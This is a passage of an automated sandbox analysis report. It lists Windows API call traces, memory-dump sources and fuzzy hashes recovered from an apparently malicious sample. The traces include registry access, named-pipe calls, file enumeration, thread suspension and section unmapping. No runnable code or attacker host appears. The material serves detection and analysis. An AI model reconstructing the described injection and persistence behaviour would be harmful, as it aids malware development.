    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
